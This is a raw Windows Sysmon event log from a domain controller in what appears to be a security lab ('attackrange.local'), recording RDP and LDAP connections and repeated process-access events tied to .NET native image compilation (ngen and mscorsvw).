14:58:54.719{A7A01FEF-B636-607E-2600-00000000BB01}2192C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local57610-true0:0:0:0:0:0:0:1win-dc-339.attackrange.local389ldap 354300x800000000000000081231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.908{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49912-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.720{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58839-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.719{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local63918- 354300x800000000000000081228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:53.719{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local63137- 10341000x800000000000000081227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.872{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-410F-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081226Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.856{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-410F-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081225Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.856{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-410F-00000000BB01}6732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081224Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.794{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-400F-00000000BB01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081223Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.794{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-400F-00000000BB01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081222Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.794{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-400F-00000000BB01}6788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.747{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6AF09EA1981D1125CB695EF32E41294C,SHA256=139C2372E3296A0B7E3D1B412749D07BC3757CF4A61E6B35733498F70E33CB2B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.716{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-3F0F-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.700{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-3F0F-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.700{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-3F0F-00000000BB01}5488C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.653{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-3E0F-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.638{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-3E0F-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.638{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-3E0F-00000000BB01}6532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.591{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-3D0F-00000000BB01}5616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.575{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-3D0F-00000000BB01}5616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.575{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-3D0F-00000000BB01}5616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.528{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-3C0F-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.434{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-3C0F-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.434{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-3C0F-00000000BB01}888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.341{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC2F-607E-3B0F-00000000BB01}4272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.325{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC2F-607E-3B0F-00000000BB01}4272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:55.325{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC2F-607E-3B0F-00000000BB01}4272C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 